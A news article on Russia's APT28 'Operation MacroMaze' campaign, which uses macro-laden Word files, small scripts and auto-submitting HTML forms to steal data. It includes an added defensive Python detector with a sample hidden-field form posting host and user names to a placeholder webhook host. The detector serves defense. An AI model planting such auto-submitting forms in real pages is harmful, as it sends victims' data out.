- APT28 (Fancy Bear) reportedly running “Operation MacroMaze” since September 2025
- Spear phishing emails carrying macro-laden Word documents are used to deploy infostealers
- Attack chain relies on simple scripts and HTML, maximizing stealth and persistence
APT28, the infamous Russian state-sponsored hacking group, also known as Fancy Bear, or Sofacy, has been observed targeting “specific entities” in Western and Central Europe with information stealers.
In a recently published report, security researchers at Lab52, the threat intelligence team of S2 Grupo, detailed “Operation MacroMaze”, which ran from at least late September 2025 to January 2026.
The campaign begins with a highly personalized spear phishing email. The topics and contents vary, but they are mainly related to diplomatic themes. In one case, researchers said they saw a lightly edited copy of official diplomatic diaries being distributed.
Word documents and macros
The emails are accompanied by a macro-laden Microsoft Word document. Macros are small programs or scripts that can be created in Microsoft Word to automate repetitive tasks. However, they have been abused so heavily over the years that Microsoft now disables them by default, especially for files downloaded from the Internet.
The attackers crafted their Word files with this in mind, tricking victims into enabling macros and executing the malicious code. Lab52 also said that the malware was designed to notify the attackers when a victim actually opened the file.
Once the macro runs, it triggers a chain reaction that, instead of dropping a single infostealer, drops multiple small scripts and HTML templates.
These establish persistence, reconstruct a command payload from downloaded fragments, collect basic system information, and exfiltrate the results via an auto-submitting HTML form.
“This campaign proves that simplicity can be powerful,” the researchers explained. “The attacker uses very basic tools (batch files, tiny VBS launchers, and simple HTML) but carefully organizes them to maximize stealth: moving operations to hidden or off-screen browser sessions, cleaning up artifacts, and outsourcing payload delivery and data exfiltration to widely used webhook services.”
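A defender-side triage check for the exfiltration stage described above, written as an added example rather than code from Lab52's report: it parses an HTML file and flags forms made of hidden fields that submit themselves on page load to an external endpoint. The sample HTML and the webhook-style hostname are constructed placeholders, not indicators from the campaign.

```python
"""Flag HTML that auto-submits a hidden-field form to an external endpoint."""
from html.parser import HTMLParser
from urllib.parse import urlparse


class _FormScanner(HTMLParser):
    def __init__(self):
        super().__init__()
        self.actions = []          # action URL of every <form>
        self.hidden_inputs = 0     # number of <input type="hidden">
        self.auto_submit = False   # submit() fired from onload or inline script
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self.actions.append(a.get("action") or "")
        elif tag == "input" and (a.get("type") or "").lower() == "hidden":
            self.hidden_inputs += 1
        elif tag == "body" and "submit(" in (a.get("onload") or ""):
            self.auto_submit = True
        elif tag == "script":
            self._in_script = True

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        # HTMLParser hands <script> bodies to handle_data as raw text
        if self._in_script and ".submit(" in data:
            self.auto_submit = True


def find_auto_submit_exfil(html, trusted_hosts=()):
    """Return the external form targets and whether the page looks like an exfil form."""
    s = _FormScanner()
    s.feed(html)
    parsed = [urlparse(u) for u in s.actions]
    external = [p.netloc for p in parsed
                if p.scheme in ("http", "https") and p.netloc not in trusted_hosts]
    return {"external_hosts": external, "auto_submit": s.auto_submit,
            "hidden_inputs": s.hidden_inputs,
            "suspicious": s.auto_submit and bool(external)}


# Constructed sample: hidden fields POSTed to a placeholder webhook host on load.
SAMPLE = """<html><body onload="document.forms[0].submit()">
<form method="POST" action="https://webhook.example.invalid/hook/placeholder">
<input type="hidden" name="host" value="WS-01">
<input type="hidden" name="user" value="jdoe">
</form></body></html>"""

if __name__ == "__main__":
    print(find_auto_submit_exfil(SAMPLE))
```

Run it over HTML files recovered from a user's temp or browser cache directories; a hit is a lead for the hidden or off-screen browser session the researchers describe, not proof on its own.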
The group behind Operation MacroMaze, APT28, has been actively involved in Russia’s “special military operation”, attacking Ukrainian infrastructure and its allies, as it wages war against Ukraine in cyberspace.
Via Hacker news